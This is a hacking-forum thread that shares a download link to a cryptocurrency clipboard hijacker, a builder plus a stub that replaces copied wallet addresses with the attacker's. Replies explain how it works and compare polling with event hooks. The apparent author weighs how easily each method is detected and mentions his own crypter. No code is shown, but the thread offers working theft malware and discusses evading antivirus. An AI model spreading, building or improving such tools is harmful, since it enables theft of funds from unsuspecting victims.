Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Crypto-Hijacker v1.1 filter_list
Author
Message
Crypto-Hijacker v1.1 #1
Today i am sharing this crypto hijacker but i donot know about it that why i donot run in my computer if any one know what it is and what is does please explain in detail .(i know its a mining software but i want in detail).

Download link-https://getlink.pw/XYUxjm


virus report-https://www.virustotal.com/#/file/651c09.../detection

Reply

RE: Crypto-Hijacker v1.1 #2
builder.exe VT (0/68): https://www.virustotal.com/#/file/5e1677.../detection
stub.exe VT (20/65 MSIL.Krypt): https://www.virustotal.com/#/file/2c77b9.../detection

Here's how it works: the stub just checks the clipboard for a cryptowallet address and if it matches the pattern, it will replace it. Nothing special, see this everywhere.
(This post was last modified: 08-17-2018, 04:41 AM by reGEN.)

Reply

RE: Crypto-Hijacker v1.1 #3
(08-17-2018, 02:29 AM)reGEN Wrote: Here's how it works: the stub just checks the clipboard for a crypto address and if it matches the pattern, it will replace it.

Clever, but very much a commonality.

Thanks for the breakdown of both virus scan reports.
[Image: AD83g1A.png]

Reply

RE: Crypto-Hijacker v1.1 #4
(08-17-2018, 04:23 AM)mothered Wrote:
(08-17-2018, 02:29 AM)reGEN Wrote: Here's how it works: the stub just checks the clipboard for a crypto address and if it matches the pattern, it will replace it.

Clever, but very much a commonality.

Thanks for the breakdown of both virus scan reports.

The way this sample does it is very inefficient as it uses an infinite while loop polling method. Other samples that I've seen - I think it was Evrial - subscribe to an event where the clipboard is activated and then performs its checks and replacement if necessary. I hereby declare that this sample is trash! BANISH IT TO THE SHADOW REALM! Cool

Reply

RE: Crypto-Hijacker v1.1 #5
(08-17-2018, 04:44 AM)reGEN Wrote:
(08-17-2018, 04:23 AM)mothered Wrote:
(08-17-2018, 02:29 AM)reGEN Wrote: Here's how it works: the stub just checks the clipboard for a crypto address and if it matches the pattern, it will replace it.

Clever, but very much a commonality.

Thanks for the breakdown of both virus scan reports.

The way this sample does it is very inefficient as it uses an infinite while loop polling method. Other samples that I've seen - I think it was Evrial - subscribe to an event where the clipboard is activated and then performs its checks and replacement if necessary. I hereby declare that this sample is trash! BANISH IT TO THE SHADOW REALM!  Cool

I was under the Impression It works similar to this.
Quote:subscribe to an event where the clipboard is activated and then performs its checks and replacement if necessary

As per your explanation, good to know It's (mediocre) method.
[Image: AD83g1A.png]

Reply

RE: Crypto-Hijacker v1.1 #6
This is my program lmao.
Yeah that’s the pretty much only flaw of the program, though the timeout and infinite loop produce almost no CPU usage and they will do the same job as the event handle.
As for the Kryptik detection it’s probably because of similar string usage in a RT crypter which I've made.
Also for the event handling, it's more efficient in performance (maybe a few ms faster than my method), but it's easier to detect imo.

Reply